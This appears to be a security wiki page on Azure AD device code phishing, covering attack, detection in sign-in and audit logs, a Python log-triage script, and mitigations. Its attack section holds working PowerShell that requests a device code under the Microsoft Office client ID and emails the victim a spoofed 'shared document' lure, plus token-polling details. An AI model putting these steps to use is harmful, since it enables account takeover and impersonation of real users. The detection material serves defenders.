Device code authentication abuse

What Is Device Code Authentication?

Device code authentication allows users to sign in to input-constrained devices such as a smart TV, IoT device, or printer. To enable this flow, the device has the user visit a webpage in their browser on another device to sign in. Once the user signs in, the device is able to get access tokens and refresh tokens as needed.

  1. An attacker connects to the /devicecode endpoint and sends a client_id and resource.

  2. After receiving the verification_uri and user_code, the attacker creates an email containing a link to the verification_uri and the user_code, and sends it to the victim.

  3. The victim clicks the link, enters the code and completes the sign-in.

  4. The attacker receives an access_token and refresh_token and can now impersonate the victim.

List of Client IDs

Access tokens are issued and stored per Client ID in Azure; the client_id sent in the request determines which application the resulting token appears to belong to.

Attack

  1. Send a POST request to oauth2/devicecode to retrieve

    1. User Code

    2. Device code string

    3. Time code expires in

# Create a body, we'll be using client id of "Microsoft Office"

$body=@{
	"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
	"resource" =  "https://graph.windows.net"
}

# Invoke the request to get device and user codes

$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
$user_code = $authResponse.user_code
  2. Send the user an email with the code and a link to "DeviceLogin" to enter the code

# Create a message

$message = @"
<html>
Hi!<br>
Here is the link to the <a href="https://microsoft.com/devicelogin">document</a>. Use the following code to access: <b>$user_code</b>. <br><br>
</html>
"@

# Send the email

Send-MailMessage -from "Don Director <dond@something.com>" -to "william.victim@target.org" -Subject "Don shared a document with you" -Body $message -SmtpServer $SMTPServer -BodyAsHtml 
  3. Retrieving the access tokens

The attacker needs to make an HTTP POST to the Azure AD token endpoint every 5 seconds:

https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0

The request must include the following parameters (device_code is the device code string returned in step 1):

Parameter | Value

client_id | d3590ed6-52b3-4102-aeff-aad2292ab01c

resource | (as sent in step 1)

device_code | CAQABAAEAAAB2UyzwtQEKR7-rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QAntABbI5ILrinFM2ze8dVKdixlThVWfM8ZPhq9p7uN8tYIuMkfVJ29aUnUBTFsYCmJCsZHkIxtmwdCsIlKpOQij2lJZzphfZX8j0nktDpaHVB0zm-vqATogllBjA-t_ZM2B0cgcjQgAA

grant_type | urn:ietf:params:oauth:grant-type:device_code

While the authentication is still pending, an HTTP 400 Bad Request is returned with the following content:

{
	"error": "authorization_pending",
	"error_description": "AADSTS70016: OAuth 2.0 device flow error. Authorization is pending. Continue polling.\r\nTrace ID: b35f261e-93cd-473b-9cf9-b81f30800600\r\nCorrelation ID: 8ee0ae8a-533f-4742-8334-e9ed939b083d\r\nTimestamp: 2020-10-14 06:06:07Z",
	"error_codes": [70016],
	"timestamp": "2020-10-13 18:06:07Z",
	"trace_id": "b35f261e-93cd-473b-9cf9-b81f30800600",
	"correlation_id": "8ee0ae8a-533f-4742-8334-e9ed939b083d",
	"error_uri": "https://login.microsoftonline.com/error?code=70016"
}

After successful login, we’ll get the following response (tokens truncated):

{
	"token_type": "Bearer",
	"scope": "user_impersonation",
	"expires_in": "7199",
	"ext_expires_in": "7199",
	"expires_on": "1602662787",
	"not_before": "1602655287",
	"resource": "https://graph.windows.net",
	"access_token": "eyJ0eXAi...HQOT1rvUEOEHLeQ",
	"refresh_token": "0.AAAAxkwD...WxPoK0Iq6W",
	"foci": "1",
	"id_token": "eyJ0eXAi...widmVyIjoiMS4wIn0."
}

Detect

This is difficult to detect without browser forensics on the victim's machine looking for navigation to https://microsoft.com/devicelogin.

What logs are available?

  • Sign-In logs

  • UAL logs

Sign-In Logs:

Azure Sign-Ins will show two simultaneous entries; focus on identifying device code authentication usage.

  • Interactive sign-in (attacker)

  • Non-interactive sign-in (when the attacker accessed a resource using the stolen OAuth token).

What will Interactive Sign-In logs show?

  • Shows device code authentication was used.

  • Logon is token based, therefore single factor is used.

  • The TA is using it to gain access to the Graph API (or whatever other resource they accessed).

  • Malicious IP

  • Client App: Mobile Apps and Desktop clients

  • User Agent.

  • Authentication Protocol: Device Code.

  • Resource ID: the resource the TA requested (e.g. Graph).

A success and failure log will trigger within 10 seconds of each other for a successful devicelogin.

What will Non-Interactive Sign-In logs show?

Non-Interactive sign-ins will show how the TA used the access token after obtaining it.

  • User Agent (anomalies could be curl, python, powershell, etc.).

  • Malicious IP

  • Client App: Mobile Apps and Desktop clients.
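The interactive and non-interactive signals above can be correlated automatically over exported sign-in records. The following triage script is an added example and not part of the original page: it flags each successful interactive sign-in with the deviceCode protocol, checks for the failure entry that lands within 10 seconds of it, and then counts the non-interactive token use from the same IP and client app during the 2-hour access-token lifetime, calling out scripted user agents. Field names follow the Microsoft Graph signIn schema (an assumption, not from the page), and the sample records are constructed.

```python
from datetime import datetime, timedelta
# Field names follow the Microsoft Graph signIn schema (my assumption, not from the page).
SCRIPTED_AGENTS = ("curl", "python", "powershell")
PAIR_WINDOW = timedelta(seconds=10)  # failure/success pair seen on a device login
FOLLOW_WINDOW = timedelta(hours=2)   # matches the 7199 s access-token lifetime above

def _ts(rec):
    return datetime.strptime(rec["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_device_code_abuse(records):
    """One finding per successful interactive deviceCode sign-in, enriched with
    the non-interactive token use from the same IP and client app that followed."""
    recs = sorted(records, key=_ts)
    findings = []
    for r in recs:
        if not (r["isInteractive"] and r["authenticationProtocol"] == "deviceCode"
                and r["status"]["errorCode"] == 0):
            continue
        t0, upn = _ts(r), r["userPrincipalName"]
        same_user = [o for o in recs if o["userPrincipalName"] == upn]
        # the authorization_pending failure that lands within 10 s of the success
        paired = any(o["isInteractive"] and o["authenticationProtocol"] == "deviceCode"
                     and o["status"]["errorCode"] != 0 and abs(_ts(o) - t0) <= PAIR_WINDOW
                     for o in same_user)
        follow = [o for o in same_user if not o["isInteractive"]
                  and o["ipAddress"] == r["ipAddress"] and o["appId"] == r["appId"]
                  and t0 <= _ts(o) <= t0 + FOLLOW_WINDOW]
        scripted = sorted({o["userAgent"] for o in follow
                           if any(a in o["userAgent"].lower() for a in SCRIPTED_AGENTS)})
        findings.append({"user": upn, "ip": r["ipAddress"], "app": r["appDisplayName"],
                         "resource": r["resourceDisplayName"], "paired_within_10s": paired,
                         "single_factor": r["authenticationRequirement"] == "singleFactorAuthentication",
                         "non_interactive_follow_ups": len(follow), "scripted_user_agents": scripted})
    return findings

def _rec(t, interactive, proto, code, ua, ip="203.0.113.7"):
    """Constructed sign-in record; every value here is invented for the sample."""
    return {"createdDateTime": t, "isInteractive": interactive, "authenticationProtocol": proto,
            "status": {"errorCode": code}, "userAgent": ua, "ipAddress": ip,
            "userPrincipalName": "william.victim@target.org", "resourceDisplayName": "Microsoft Graph",
            "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "appDisplayName": "Microsoft Office",
            "authenticationRequirement": "singleFactorAuthentication"}

SAMPLE_SIGNINS = [  # constructed sample records, not real log data
    _rec("2020-10-14T06:06:07Z", True, "deviceCode", 70016, "Mozilla/5.0"),  # pending
    _rec("2020-10-14T06:06:12Z", True, "deviceCode", 0, "Mozilla/5.0"),      # success
    _rec("2020-10-14T06:07:30Z", False, "oAuth2", 0, "python-requests/2.24"),
    _rec("2020-10-14T06:09:01Z", False, "oAuth2", 0, "curl/7.68.0"),
    _rec("2020-10-14T07:00:00Z", True, "oAuth2", 0, "Mozilla/5.0", ip="198.51.100.5"),  # normal
]
```

Run `find_device_code_abuse` over the records exported from the Sign-in logs blade (or pulled from the Graph signIns endpoint) and review each finding's IP, client app and scripted user agents against the expected activity for that user.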

What will UAL logs show?

Located in M365 Defender Portal: https://security.microsoft.com/

  • Attacker IP triggering "User Logged In" for every operation they perform with stolen token.

  • ExtendedProperties Request Type: CMSI

    • CMSI: Check my Sign-In (triggered when platform requires user to validate request, i.e. user gives consent to application).

  • Item: Microsoft Graph (the resource the TA requested).

  • Application ID: the client ID the TA is pretending to be (e.g. Microsoft Office).

Mitigate

There are not many ways to prevent this abuse.

  • Implement location based Conditional Access Policies.

  • Control how a user is allowed to log in to their account.
